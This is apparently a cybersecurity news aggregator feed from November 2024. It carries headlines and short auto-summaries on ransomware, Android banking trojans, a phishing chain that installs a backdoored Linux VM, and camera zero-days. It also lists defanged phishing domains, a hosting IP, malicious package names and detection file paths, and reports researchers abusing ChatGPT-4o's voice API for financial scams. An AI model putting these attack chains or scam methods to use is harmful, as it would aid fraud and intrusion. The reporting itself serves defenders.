        2024-11-06 https://www.bleepingcomputer.com/news/security/washington-courts-systems-offline-following-weekend-cyberattack/
        Court systems across Washington state have been down since Sunday when officials said "unauthorized activity" was detected on their networks. [...] "

        Autosummary: "


        VEILDrive Attack Exploits Microsoft Services to Evade Detection and Distribute Malware

        exploits
        2024-11-06 https://thehackernews.com/2024/11/veildrive-attack-exploits-microsoft.html
        An ongoing threat campaign dubbed VEILDrive has been observed taking advantage of legitimate services from Microsoft, including Teams, SharePoint, Quick Assist, and OneDrive, as part of its modus operandi. "Leveraging Microsoft SaaS services — including Teams, SharePoint, Quick Assist, and OneDrive — the attacker exploited the trusted infrastructures of previously compromised organizations to "

        Autosummary: "Leveraging Microsoft SaaS services — including Teams, SharePoint, Quick Assist, and OneDrive — the attacker exploited the trusted infrastructures of previously compromised organizations to distribute spear-phishing attacks and store malware," Israeli cybersecurity company Hunters said in a new report. "


        Memorial Hospital and Manor suffered a ransomware attack

        exploits ransomware
        2024-11-06 https://securityaffairs.com/170629/cyber-crime/memorial-hospital-and-manor-ransomware-attack.html
        In Georgia, a ransomware attack disrupted Memorial Hospital and Manor’s access to its Electronic Health Record system. A ransomware attack hit Memorial Hospital and Manor in Bainbridge, Georgia, and disrupted the access to its Electronic Health Record system. Memorial Hospital and Manor is a community hospital and healthcare facility that serves Decatur County and surrounding areas […] "

        Autosummary: The Embargo ransomware gang has been active since April 2024; it runs a ransomware-as-a-service model and has claimed eight attacks, including another two attacks on U.S. healthcare providers, NorthBay Healthcare and Weiser Memorial Hospital. "


        Hackers increasingly use Winos4.0 post-exploitation kit in attacks

        exploits
        2024-11-06 https://www.bleepingcomputer.com/news/security/hackers-increasingly-use-winos40-post-exploitation-kit-in-attacks/
        Hackers are increasingly targeting Windows users with the malicious Winos4.0 framework, distributed via seemingly benign game-related apps. [...] "

        Autosummary: Complete Winos4.0 attack chain Source: Fortinet Winos4.0 checks for a variety of security tools on the system, including Kaspersky, Avast, Avira, Symantec, Bitdefender, Dr.Web, Malwarebytes, McAfee, AhnLab, ESET, Panda Security, and the now discontinued Microsoft Security Essentials. "


        Google Warns of Actively Exploited CVE-2024-43093 Vulnerability in Android System

        exploits
        2024-11-05 https://thehackernews.com/2024/11/google-warns-of-actively-exploited-cve.html
        Google has warned that a security flaw impacting its Android operating system has come under active exploitation in the wild. The vulnerability, tracked as CVE-2024-43093, has been described as a privilege escalation flaw in the Android Framework component that could result in unauthorized access to "Android/data," "Android/obb," and "Android/sandbox" directories and their sub-directories, "

        Autosummary: "


        Cybersecurity jobs available right now: November 5, 2024

        ciber
        2024-11-05 https://www.helpnetsecurity.com/2024/11/05/cybersecurity-jobs-available-right-now-november-5-2024/

        Application Security Engineer MassMutual | USA | Hybrid – View job details As an Application Security Engineer, you will conduct in-depth security assessments, including vulnerability scanning, and code reviews. Ensure secure coding practices are followed, and security controls are incorporated into software designs. Conduct detailed threat modeling to identify attack vectors and potential weaknesses. Ensure compliance with security regulations, frameworks, and industry standards such as OWASP. Cybersecurity Engineer, Resilience Electrolux Group | Italy | On-site … More

        The post Cybersecurity jobs available right now: November 5, 2024 appeared first on Help Net Security.

        "

        Autosummary: Offensive Security Engineer Cyberbit | Israel | On-site – View job details As an Offensive Security Engineer, you will design, build, and implement red team labs, vulnerable websites, CTF challenges, and exercises tailored for varying skill levels, covering offensive security concepts, AWS-based infrastructure, and Docker deployments. Senior Threat Detection and Validation Engineer dunnhumby | United Kingdom | Hybrid – View job details As a Senior Threat Detection and Validation Engineer, you will conduct periodic validation testing (including, but not limited to, atomic testing, breach and attack simulations, adversary simulation exercises, purple teaming, tabletops, and penetration testing) to validate the effectiveness or identify security gaps and vulnerabilities in the organization’s security controls. Senior Penetration Tester emaratech | UAE | On-site – View job details As a Senior Penetration Tester, you will perform in-depth penetration tests on web applications, mobile applications (iOS and Android), network infrastructure (web server, DB, Firewall, wireless access points), and cloud environments. Senior Manager, Security Architecture Ontario Power Generation | Canada | On-Site – View job details As a Senior Manager, Security Architecture, you will provide leadership for the development of the security strategy and contribute to the delivery of critical cyber security projects across Cloud, IT and OT to improve overall security capabilities, maturity, and risk posture. "


        Malware Campaign Uses Ethereum Smart Contracts to Control npm Typosquat Packages

        exploits
        2024-11-05 https://thehackernews.com/2024/11/malware-campaign-uses-ethereum-smart.html
        An ongoing campaign is targeting npm developers with hundreds of typosquat versions of their legitimate counterparts in an attempt to trick them into running cross-platform malware. The attack is notable for utilizing Ethereum smart contracts for command-and-control (C2) server address distribution, according to independent findings from Checkmarx, Phylum, and Socket published over the past few "

        Autosummary: "


        Canadian Suspect Arrested Over Snowflake Data Breach and Extortion Attacks

        financial
        2024-11-05 https://thehackernews.com/2024/11/canadian-suspect-arrested-over.html
        Canadian law enforcement authorities have arrested an individual who is suspected to have conducted a series of hacks stemming from the breach of cloud data warehousing platform Snowflake earlier this year. The individual in question, Alexander "Connor" Moucka (aka Judische and Waifu), was apprehended on October 30, 2024, on the basis of a provisional arrest warrant, following a request by the "

        Autosummary: The individual in question, Alexander "Connor" Moucka (aka Judische and Waifu), was apprehended on October 30, 2024, on the basis of a provisional arrest warrant, following a request by the U.S. The development was first reported by Bloomberg and corroborated by 404 Media. "


        Google patches actively exploited Android vulnerability (CVE-2024-43093)

        exploits
        2024-11-05 https://www.helpnetsecurity.com/2024/11/05/cve-2024-43093/

        Google has delivered fixes for two vulnerabilities endangering Android users that “may be under limited, targeted exploitation”: CVE-2024-43047, a flaw affecting Qualcomm chipsets, and CVE-2024-43093, a vulnerability in the Google Play framework. The exploited vulnerabilities (CVE-2024-43047, CVE-2024-43093) Qualcomm patched CVE-2024-43047 – a use-after-free vulnerability in the Digital Signal Processor (DSP) service that could be exploited to escalate privileges on targeted devices – in October 2024, and urged original equipment manufacturers (OEMs) to deploy the patches … More

        The post Google patches actively exploited Android vulnerability (CVE-2024-43093) appeared first on Help Net Security.

        "

        Autosummary: "


        Report: Voice of Practitioners 2024 – The True State of Secrets Security

        government
        2024-11-05 https://www.helpnetsecurity.com/2024/11/05/report-voice-of-practitioners-2024/

        In this study, GitGuardian and CyberArk reveal the stark reality of secrets management across 1,000 organizations. With 79% experiencing secrets leaks and an average remediation time of 27 days, the findings expose critical gaps between security confidence and reality. Learn how leading organizations tackle the secrets sprawl crisis and what sets successful security programs apart from the rest. Get actionable insights into modernizing your secrets security strategy for today’s cloud-native world. Download the Voice of … More

        The post Report: Voice of Practitioners 2024 – The True State of Secrets Security appeared first on Help Net Security.

        "

        Autosummary: "


        Android flaw CVE-2024-43093 may be under limited, targeted exploitation

        exploits
        2024-11-05 https://securityaffairs.com/170581/uncategorized/cve-2024-43093-android-flaw-actively-exploited.html
        Google warned that a vulnerability, tracked as CVE-2024-43093, in the Android OS is actively exploited in the wild. Threat actors are actively exploiting a vulnerability, tracked as CVE-2024-43093, in the Android OS, Google warns. The vulnerability is a privilege escalation issue in the Android Framework component. Successful exploitation of the vulnerability could lead to unauthorized […] "

        Autosummary: "


        US warns of last-minute Iranian and Russian election influence ops

        rusia-ucrania
        2024-11-05 https://www.bleepingcomputer.com/news/security/us-warns-of-last-minute-iranian-and-russian-election-influence-ops/
        The U.S. Cybersecurity & Infrastructure Security Agency is warning about last-minute influence operations conducted by Iranian and Russian actors to undermine the public trust in the integrity and fairness of the upcoming presidential election. [...] "

        Autosummary: "Influence actors linked to Russia, in particular, are manufacturing videos and creating fake articles to undermine the legitimacy of the election, instill fear in voters regarding the election process, and suggest Americans are using violence against each other due to political preferences, judging from information available to the IC," describes CISA. "


        Google fixes two Android zero-days used in targeted attacks

        exploits
        2024-11-05 https://www.bleepingcomputer.com/news/security/google-fixes-two-android-zero-days-used-in-targeted-attacks/
        Google fixed two actively exploited Android zero-day flaws as part of its November security updates, addressing a total of 51 vulnerabilities. [...] "

        Autosummary: The first level addresses core Android vulnerabilities, with 17 issues this time, while the second patch level encompasses those plus vendor-specific fixes (Qualcomm, MediaTek, etc.), counting an additional 34 fixes this month. "


        Beware of phishing emails delivering backdoored Linux VMs!

        financial Linux
        2024-11-05 https://www.helpnetsecurity.com/2024/11/05/phishing-oneamerica-survey-linux-vm-backdoor/

        Unknown attackers are trying to trick Windows users into spinning up a custom Linux virtual machine (VM) with a pre-configured backdoor, Securonix researchers have discovered. The attack began with a phishing email, they believe, but they weren’t able to pinpoint the intended victims. The email included a link pointing to an unusually big ZIP file (285 MB), and its name – OneAmerica Survey.zip – points to the likely lure: a survey by OneAmerica … More

        The post Beware of phishing emails delivering backdoored Linux VMs! appeared first on Help Net Security.

        "

        Autosummary: If the user clicks on the shortcut file, a process is started wherein:
        The ZIP file is “unzipped” and its contents put into the user’s profile directory, into a directory called “datax”.
        A batch processing (BAT) file is executed; it shows a decoy image saying there was an “Internal Server Error” while, in the background, a (renamed) QEMU process and command line is executed to start the emulated Tiny Core Linux environment.
        The customized Linux VM is meant to be used to create an interactive shell (essentially, a backdoor) on the host machine by initiating an SSH connection, through which the attackers can: "


        New Android Banking Malware "ToxicPanda" Targets Users with Fraudulent Money Transfers

        financial exploits
        2024-11-05 https://thehackernews.com/2024/11/new-android-banking-malware-toxicpanda.html
        Over 1,500 Android devices have been infected by a new strain of Android banking malware called ToxicPanda that allows threat actors to conduct fraudulent banking transactions. "ToxicPanda's main goal is to initiate money transfers from compromised devices via account takeover (ATO) using a well-known technique called on-device fraud (ODF)," Cleafy researchers Michele Roviello, Alessandro Strino "

        Autosummary: A majority of the compromises have been reported in Italy (56.8%), followed by Portugal (18.7%), Hong Kong (4.6%), Spain (3.9%), and Peru (3.4%), marking a rare instance of a Chinese threat actor orchestrating a fraudulent scheme to target retail banking users in Europe and Latin America. "


        U.S. CISA adds PTZOptics camera bugs to its Known Exploited Vulnerabilities catalog

        exploits industry
        2024-11-05 https://securityaffairs.com/170595/security/u-s-cisa-adds-ptzoptics-camera-bugs-to-its-known-exploited-vulnerabilities-catalog.html
        U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds PTZOptics PT30X-SDI/NDI camera bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: Threat actors are attempting to exploit the two zero-day vulnerabilities CVE-2024-8956 and CVE-2024-8957 in PTZOptics pan-tilt-zoom (PTZ) live streaming cameras, GreyNoise researchers warned last week. GreyNoise […] "

        Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog:
        CVE-2024-8957 PTZOptics PT30X-SDI/NDI Cameras OS Command Injection Vulnerability
        CVE-2024-8956 PTZOptics PT30X-SDI/NDI Cameras Authentication Bypass Vulnerability
        Threat actors are attempting to exploit the two zero-day vulnerabilities CVE-2024-8956 and CVE-2024-8957 in PTZOptics pan-tilt-zoom (PTZ) live streaming cameras, GreyNoise researchers warned last week. "


        Pig's head thrown on pitch during derby in Brazil

        latam
        2024-11-05 https://www.bbc.com/sport/football/articles/c0lpnr99986o
        A pig's head is thrown onto the pitch during the Sao Paulo derby between Corinthians and Palmeiras in the Brazilian championship. "

        Autosummary: "


        ToxicPanda Android banking trojan targets Europe and LATAM, with a focus on Italy

        financial exploits
        2024-11-05 https://securityaffairs.com/170605/malware/toxicpanda-android-malware-targets-italy.html
        The ToxicPanda Android malware has infected over 1,500 devices, enabling attackers to perform fraudulent banking transactions. Cleafy researchers spotted a new Android banking malware, dubbed ToxicPanda, which has already infected over 1,500 Android devices. The ToxicPanda malware shares some bot command similarities with the TgToxic trojan family, which was observed spreading in Southeast Asia. However, the malicious […] "

        Autosummary: “According to its source code, ToxicPanda is in an early stage of development, with some commands appearing as placeholders without a real implementati” ToxicPanda, similar to other banking trojans like Medusa, BingoMod, and Copybara, uses a manual approach that allows attackers to target any bank customer, requires less technical skill, and helps them bypass banks’ behavioral detection defenses. Though still in early development, with incomplete code elements, ToxicPanda has infected thousands of devices across Italy, Portugal, Spain, and Latin America, targeting 16 banks. "


        IRISSCON 2024 to address AI’s dual impact on cybersecurity

        ciber
        2024-11-04 https://www.helpnetsecurity.com/2024/11/04/irisscon-2024/

        The IRISSCERT Cyber Crime Conference (IRISSCON) returns on November 6th at the Aviva Stadium, where global cybersecurity leaders will explore AI’s revolutionary role in defending against and contributing to cyber threats. As Ireland’s longest-standing cybersecurity conference, IRISSCON 2024 will dive into AI’s impact on how it both enhances security and enables cybercriminals to scale and automate attacks. With generous support from diamond sponsors ESET, Symantec, and BH Consulting, the event will highlight cutting-edge AI strategies … More

        The post IRISSCON 2024 to address AI’s dual impact on cybersecurity appeared first on Help Net Security.

        "

        Autosummary: "


        Hiring guide: Key skills for cybersecurity researchers

        ciber
        2024-11-04 https://www.helpnetsecurity.com/2024/11/04/rachel-barouch-haik-hiring-cybersecurity-researchers/

        In this Help Net Security interview, Rachel Barouch, an Organizational Coach for VCs and startups and a former VP HR in both a VC and a Cybersecurity startup, discusses the dynamics of cybersecurity researchers and team-building strategies. She highlights that these researchers, often brilliant and introverted, come with distinctive working styles, making it challenging to foster collaboration. However, with the right approach to assessing, managing, retaining and developing them, organizations can unlock their potential and … More

        The post Hiring guide: Key skills for cybersecurity researchers appeared first on Help Net Security.

        "

        Autosummary: However, with the right approach to assessing, managing, retaining and developing them, organizations can unlock their potential and drive high-performance teams, ultimately boosting the startup’s market value, especially in the context of mergers and acquisitions (M&As). Programming expertise, particularly in languages like Python, C/C++, and assembly, combined with deep knowledge of operating system internals, is crucial. "


        Cybersecurity in crisis: Are we ready for what’s coming?

        ciber
        2024-11-04 https://www.helpnetsecurity.com/2024/11/04/cyber-protection-level-video/

        In this Help Net Security video, James Edgar, CISO at Corpay, reveals insights into cybersecurity health, concerns, challenges, and other considerations for building a solid defense program. Key insights revealed in Corpay’s 2024 State of Business Cybersecurity Report: 67% of respondents blame lack of capital resources for preventing companies from reaching their desired level of cyber protection. 61% of respondents plan to test or implement AI tools for cybersecurity purposes in the next 12 months. … More

        The post Cybersecurity in crisis: Are we ready for what’s coming? appeared first on Help Net Security.

        "

        Autosummary: "


        New FakeCall Malware Variant Hijacks Android Devices for Fraudulent Banking Calls

        financial exploits
        2024-11-04 https://thehackernews.com/2024/11/new-fakecall-malware-variant-hijacks.html
        Cybersecurity researchers have discovered a new version of a well-known Android malware family dubbed FakeCall that employs voice phishing (aka vishing) techniques to trick users into parting with their personal information. "FakeCall is an extremely sophisticated Vishing attack that leverages malware to take almost complete control of the mobile device, including the interception of incoming "

        Autosummary: The names of the malicious package names, i.e., dropper apps, bearing the malware are listed below - com.qaz123789.serviceone com.sbbqcfnvd.skgkkvba com.securegroup.assistant com.seplatmsm.skfplzbh eugmx.xjrhry.eroreqxo gqcvctl.msthh.swxgkyv ouyudz.wqrecg.blxal plnfexcq.fehlwuggm.kyxvb xkeqoi.iochvm.vmyab Like other Android banking malware families that are known to abuse accessibility services APIs to seize control of the devices and perform malicious actions, FakeCall uses it to capture information displayed on the screen and grant itself additional permissions as required. "


        Cyber Threats That Could Impact the Retail Industry This Holiday Season (and What to Do About It)

        industry
        2024-11-04 https://thehackernews.com/2024/11/cyber-threats-that-could-impact-retail.html
        As the holiday season approaches, retail businesses are gearing up for their annual surge in online (and in-store) traffic. Unfortunately, this increase in activity also attracts cybercriminals looking to exploit vulnerabilities for their gain.  Imperva, a Thales company, recently published its annual holiday shopping cybersecurity guide. Data from the Imperva Threat Research team’s "

        Autosummary: Key steps include evaluating traffic risks, identifying entry points, blocking outdated user agents, limiting proxies, implementing rate limiting, and monitoring for signs of automation or headless browsers.
        DDoS Attacks Remain a Persistent Threat
        Distributed Denial-of-Service (DDoS) attacks are nearly as common as business logic abuse, representing 30.6% of AI-driven threats to retailers — and they are becoming progressively more prominent. The financial impact of a successful DDoS attack can be staggering, with businesses facing revenue loss, increased recovery costs, and potential long-term damage to their brand reputation. "


        Google’s AI Tool Big Sleep Finds Zero-Day Vulnerability in SQLite Database Engine

        exploits
        2024-11-04 https://thehackernews.com/2024/11/googles-ai-tool-big-sleep-finds-zero.html
        Google said it discovered a zero-day vulnerability in the SQLite open-source database engine using its large language model (LLM) assisted framework called Big Sleep (formerly Project Naptime). The tech giant described the development as the "first real-world vulnerability" uncovered using the artificial intelligence (AI) agent. "We believe this is the first public example of an AI agent finding "

        Autosummary: "


        Windows infected with backdoored Linux VMs in new phishing attacks

        financial Linux
        2024-11-04 https://www.bleepingcomputer.com/news/security/windows-infected-with-backdoored-linux-vms-in-new-phishing-attacks/
        A new phishing campaign dubbed "CRON#TRAP" infects Windows with a Linux virtual machine that contains a built-in backdoor to give stealthy access to corporate networks. [...] "

        Autosummary: Start.bat batch file installing the QEMU Linux virtual machine Source: BleepingComputer While the virtual machine is being installed, the same batch file will display a PNG file downloaded from a remote site that shows a fake server error as a decoy, implying a broken link to the survey. "


        City of Columbus: Data of 500,000 stolen in July ransomware attack

        exploits government ransomware
        2024-11-04 https://www.bleepingcomputer.com/news/security/city-of-columbus-data-of-500-000-stolen-in-july-ransomware-attack/
        The City of Columbus, Ohio, notified 500,000 individuals that a ransomware gang stole their personal and financial information in a July 2024 cyberattack. [...] "

        Autosummary: "The information involved in the Incident may have included your personal information, such as your first and last name, date of birth, address, bank account information, driver's license(s), Social Security number, and other identifying information concerning you and/or your interactions with the City," the breach notification letters reveal. "


        THN Recap: Top Cybersecurity Threats, Tools, and Practices (Oct 28 - Nov 03)

        ciber
        2024-11-04 https://thehackernews.com/2024/11/thn-recap-top-cybersecurity-threats.html
        This week was a total digital dumpster fire! Hackers were like, "Let's cause some chaos!" and went after everything from our browsers to those fancy cameras that zoom and spin. (You know, the ones they use in spy movies? 🕵️‍♀️) We're talking password-stealing bots, sneaky extensions that spy on you, and even cloud-hacking ninjas! 🥷 It's enough to make you want to chuck your phone in the ocean.

        Autosummary: Trending CVEs: CVE-2024-50550, CVE-2024-7474, CVE-2024-7475, CVE-2024-5982, CVE-2024-10386, CVE-2023-6943, CVE-2023-2060, CVE-2024-45274, CVE-2024-45275, CVE-2024-51774. Around the Cyber World. Security Flaws in PTZ Cameras: Threat actors are attempting to exploit two zero-day vulnerabilities in pan-tilt-zoom (PTZ) live streaming cameras used in industrial, healthcare, business conferences, government, religious places, and courtroom settings. Affected cameras use VHD PTZ camera firmware < 6.3.40, which is found in PTZOptics, Multicam Systems SAS, and SMTAV Corporation devices based on Hisilicon Hi3516A V600 SoC V60, V61, and V63. Multiple Vulnerabilities in OpenText NetIQ iManager: Nearly a dozen flaws have been disclosed in OpenText NetIQ iManager, an enterprise directory management tool, some of which could be chained together by an attacker to achieve pre-authentication remote code execution, or allow an adversary with valid credentials to escalate their privileges within the platform and ultimately achieve post-authenticated code execution. Funnull, the Chinese company that acquired the Polyfill[.]io JavaScript library earlier this year, has been linked to investment scams, fake trading apps, and suspect gambling networks.


        Nigerian man Sentenced to 26+ years in real estate phishing scams

        financial government
        2024-11-04 https://securityaffairs.com/170561/cyber-crime/nigerian-man-26-years-jail-phishing-scams.html
        Nigerian Kolade Ojelade gets 26 years in U.S. for phishing scams that stole millions by hacking email accounts. A Nigerian national was sentenced to 26 years in prison in the US for stealing millions by compromising the email accounts of real estate businesses. The Nigerian national, Kolade Akinwale Ojelade (34), a resident of […]

        Autosummary: Nigerian man Sentenced to 26+ years in real estate phishing scams. Pierluigi Paganini, November 04, 2024. Nigerian Kolade Ojelade gets 26 years in U.S. for phishing scams that stole millions by hacking email accounts.


        Russian disinformation campaign active ahead of 2024 US election

        rusia-ucrania
        2024-11-04 https://securityaffairs.com/170551/intelligence/russia-disinformation-us-election-2024.html
        U.S. intel says Russia made a fake video claiming Haitians voted illegally in Georgia, aiming to spread election disinformation. U.S. intel reports Russia created a fake viral video falsely claiming Haitians illegally voted multiple times in Georgia, aiming to spread election disinformation. U.S. intelligence agencies’ claims are based on existing intel and past Russian disinformation […]

        Autosummary: At the end of October, the Office of the Director of National Intelligence (ODNI), the Federal Bureau of Investigation (FBI), and the Cybersecurity and Infrastructure Security Agency (CISA) released the following statement: “The IC assesses that Russian actors manufactured and amplified a recent video that falsely depicted an individual ripping up ballots in Pennsylvania, judging from information available to the IC and prior activities of other Russian influence actors, including videos and other disinformation activities.”


        Custom "Pygmy Goat" malware used in Sophos Firewall hack on govt network

        exploits
        2024-11-04 https://www.bleepingcomputer.com/news/security/custom-pygmy-goat-malware-used-in-sophos-firewall-hack-on-govt-network/
        UK's National Cyber Security Centre (NCSC) has published an analysis of a Linux malware named "Pigmy Goat" created to backdoor Sophos XG firewall devices as part of recently disclosed attacks by Chinese threat actors. [...]

        Autosummary: Additionally, manual checks for /lib/libsophos.so, /tmp/.sshd.ipc, /tmp/.fgmon_cli.ipc, /var/run/sshd.pid, and /var/run/goat.pid can reveal an infection.


        City of Columbus breach affects around half a million citizens

        government
        2024-11-04 https://www.malwarebytes.com/blog/news/2024/11/city-of-columbus-breach-affects-around-half-a-million-citizens
        A ransomware attack against the City of Columbus, Ohio—which drew public scrutiny following the city government’s attempt to silence a researcher...

        Autosummary: According to the official statement, the ransomware group was also able to view and access certain sensitive personal information, which may have included first and last name, date of birth, address, bank account information, City employee account number and position, City employment and payroll records, Social Security Number (SSN), and other identifying information. The City Auditor’s Office examines City operations to identify an opportunity to reduce costs, increase efficiency, quality and effectiveness, or otherwise improve management of a city function, program, service or policy. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.


        Crooks bank on Microsoft’s search engine to phish customers

        financial
        2024-11-04 https://www.malwarebytes.com/blog/scams/2024/11/crooks-bank-on-microsofts-search-engine-to-phish-customers
        If you searched for your bank's login page via Bing recently, you may have visited a fraudulent website enabling criminals to get your credentials and even your two-factor security code.

        Autosummary: Indicators of Compromise. Cloaking domain: ixx-kexxx[.]com. Phishing domains: xxx-ii-news[.]net, xxx-ii-news[.]com, ixxx-blognew[.]com, new-bllog-i[.]com, info-blog-news[.]com, xv-bloging-info[.]com, xxx-new-videos[.]com. Hosting server: 200.107.207[.]232. This is because of the built-in anti-phishing heuristic rules which intercept the connection and display a warning message. If you suspect your banking information has already been stolen, try to take action as quickly as possible by contacting your financial institution(s) and resetting all your passwords (especially if you reused any of them for different websites). Bypassing multi-factor authentication: In some phishing campaigns, criminals are notified in real time when a new victim attempts to log in to their fraudulent page.


        July 2024 ransomware attack on the City of Columbus impacted 500,000 people

        exploits government ransomware
        2024-11-04 https://securityaffairs.com/170568/data-breach/city-of-columbus-ransomware-attack-impacted-500000-people.html
        The July 2024 ransomware attack that hit the City of Columbus, Ohio, exposed the personal and financial data of 500,000 individuals. On July 18, 2024, the City of Columbus, Ohio, suffered a cyber attack that impacted the City’s services. On July 29, 2024, the City published an update on the City’s website and confirmed that the […]

        Autosummary: “The information involved in the Incident may have included your personal information, such as your first and last name, date of birth, address, bank account information, driver’s license(s), Social Security number, and other identifying information concerning you and/or your interactions with the City.”


        Week in review: Windows Themes spoofing bug “returns”, employees phished via Microsoft Teams

        exploits
        2024-11-03 https://www.helpnetsecurity.com/2024/11/03/week-in-review-windows-themes-spoofing-bug-returns-employees-phished-via-microsoft-teams/

        Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Patching problems: The “return” of a Windows Themes spoofing vulnerability. Despite two patching attempts, a security issue that may allow attackers to compromise Windows users’ NTLM (authentication) credentials via a malicious Windows themes file still affects Microsoft’s operating system, 0patch researchers have discovered. Black Basta operators phish employees via Microsoft Teams. Black Basta ransomware affiliates are still trying to trick … More

        The post Week in review: Windows Themes spoofing bug “returns”, employees phished via Microsoft Teams appeared first on Help Net Security.


        Autosummary: Infosec products of the month: October 2024. Here’s a look at the most interesting products from the past month, featuring releases from: Action1, Balbix, BreachLock, Commvault, Dashlane, Data Theorem, Edgio, ExtraHop, Fastly, Frontegg, GitGuardian, IBM, Ivanti, Jumio, Kusari, Legit Security, Metomic, Nametag, Neon, Nucleus Security, Okta, Qualys, Rubrik, SAFE Security, Sectigo, Securiti, Veeam Software, and XM Cyber. Simplifying decentralized identity systems for everyday use: In this Help Net Security interview, Carla Roncato, VP of Identity at WatchGuard Technologies, discusses how companies can balance privacy, security, and usability in digital identity systems.


        SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 18

        exploits
        2024-11-03 https://securityaffairs.com/170532/malware/security-affairs-malware-newsletter-round-18.html
        Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. EIW — ESET Israel Wiper — used in active attacks targeting Israeli orgs. Tenacious Pungsan: A DPRK […]



        ChatGPT-4o can be used for autonomous voice-based scams

        financial
        2024-11-03 https://www.bleepingcomputer.com/news/security/chatgpt-4o-can-be-used-for-autonomous-voice-based-scams/
        Researchers have shown that it's possible to abuse OpenAI's real-time voice API for ChatGPT-4o, an advanced LLM chatbot, to conduct financial scams with low to moderate success rates. [...]

        Autosummary: [Figure: Scam types and success rate (Source: Arxiv.org)] OpenAI's response: OpenAI told BleepingComputer that its latest model, o1 (currently in preview), which supports "advanced reasoning," was built with better defenses against this kind of abuse. Study findings: The researchers' paper explores various scams like bank transfers, gift card exfiltration, crypto transfers, and credential stealing for social media or Gmail accounts.


        Meet Interlock — The new ransomware targeting FreeBSD servers

        exploits ransomware
        2024-11-03 https://www.bleepingcomputer.com/news/security/meet-interlock-the-new-ransomware-targeting-freebsd-servers/
        A relatively new ransomware operation named Interlock attacks organizations worldwide, taking the unusual approach of creating an encryptor to target FreeBSD servers. [...]

        Autosummary: interlock.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=c7f876806bf4d3ccafbf2252e77c2a7546c301e6, for FreeBSD 10.4, FreeBSD-style, not stripped. However, even when testing the sample on a FreeBSD virtual machine, BleepingComputer was unable to get the sample to properly execute.


        Microsoft SharePoint RCE bug exploited to breach corporate network

        exploits
        2024-11-02 https://www.bleepingcomputer.com/news/security/microsoft-sharepoint-rce-bug-exploited-to-breach-corporate-network/
        A recently disclosed Microsoft SharePoint remote code execution (RCE) vulnerability tracked as CVE-2024-38094 is being exploited to gain initial access to corporate networks. [...]

        Autosummary: Specifically, the attacker used a batch script ("hrword install.bat") to install Huorong Antivirus on the system, set up a custom service ("sysdiag"), execute a driver ("sysdiag_win10.sys"), and run "HRSword.exe" using a VBS script.


        PTZOptics cameras zero-days actively exploited in the wild

        exploits industry
        2024-11-02 https://securityaffairs.com/170456/hacking/ptzoptics-cameras-flaws-exploited.html
        Hackers are exploiting two zero-day vulnerabilities, tracked as CVE-2024-8956 and CVE-2024-8957, in PTZOptics cameras. Threat actors are attempting to exploit two zero-day vulnerabilities, tracked as CVE-2024-8956 and CVE-2024-8957, in PTZOptics pan-tilt-zoom (PTZ) live streaming cameras, GreyNoise researchers warn. GreyNoise discovered the two flaws while investigating the use of an exploit detected by its LLM-powered threat-hunting tool Sift. The company discovered […]

        Autosummary: PTZOptics cameras zero-days actively exploited in the wild. Pierluigi Paganini, November 02, 2024. Hackers are exploiting two zero-day vulnerabilities, tracked as CVE-2024-8956 and CVE-2024-8957, in PTZOptics cameras.


        Bolivia military post seized and soldiers kidnapped

        latam
        2024-11-02 https://www.bbc.com/news/articles/c937kekx3nqo
        The move comes after weeks of clashes between security forces and supporters of ex-President Evo Morales.



        50% of financial orgs have high-severity security flaws in their apps

        financial
        2024-11-01 https://www.helpnetsecurity.com/2024/11/01/financial-sector-applications-security-debt/

        Security debt, defined for this report as flaws that remain unfixed for longer than a year, exists in 76% of organizations in the financial services sector, with 50% of organizations carrying critical security debt, according to Veracode. Financial sector apps accumulate more security debt With the average cost of a data breach in the financial industry estimated to be $6.08 million, the research comes at a critical time for one of the most highly targeted … More

        The post 50% of financial orgs have high-severity security flaws in their apps appeared first on Help Net Security.


        Autosummary: Security debt, defined for this report as flaws that remain unfixed for longer than a year, exists in 76% of organizations in the financial services sector, with 50% of organizations carrying critical security debt, according to Veracode.


        OpenPaX: Open-source kernel patch that mitigates memory safety errors

        Linux
        2024-11-01 https://www.helpnetsecurity.com/2024/11/01/openpax-open-source-kernel-patch/

        OpenPaX is an open-source kernel patch that mitigates common memory safety errors, re-hardening systems against application-level memory safety attacks using a simple Linux kernel patch. It’s available under the same GPLv2 license terms as the Linux kernel. “We are pleased to be able to bring this to the industry at large and as an integrated offering for our customers with Edera Protect,” said Ariadne Conill, distinguished engineer at Edera and maintainer of Alpine Linux. “Until … More

        The post OpenPaX: Open-source kernel patch that mitigates memory safety errors appeared first on Help Net Security.




        Threat actors are stepping up their tactics to bypass email protections

        industry
        2024-11-01 https://www.helpnetsecurity.com/2024/11/01/cybercriminals-emails-protections-video/

        Although most organizations use email services with built-in security features that filter out suspicious messages, criminals always find a way to bypass these systems. With the development of AI technology, phishing is becoming increasingly difficult to recognize, allowing attackers to circumvent security measures. While most attempts do not succeed, it only takes one to cause significant damage to a company’s operations. Mick Leach, Field CISO at Abnormal Security, discusses why the automotive industry is the new … More

        The post Threat actors are stepping up their tactics to bypass email protections appeared first on Help Net Security.




        Stop LUCR-3 Attacks: Learn Key Identity Security Tactics in This Expert Webinar

        industry
        2024-11-01 https://thehackernews.com/2024/11/stop-lucr-3-attacks-learn-key-identity.html
        Did you know that advanced threat actors can infiltrate the identity systems of major organizations and extract sensitive data within days? It’s a chilling reality, becoming more common and concerning by the day. These attackers exploit vulnerabilities in SaaS and cloud environments, using compromised identities to move laterally within networks, causing widespread damage. Cybersecurity and IT

        Autosummary: Gain practical strategies for identifying and responding to suspicious activity across identity providers, cloud platforms, and SaaS applications.


        New Phishing Kit Xiū gǒu Targets Users Across Five Countries With 2,000 Fake Sites

        financial
        2024-11-01 https://thehackernews.com/2024/11/new-phishing-kit-xiu-gou-targets-users.html
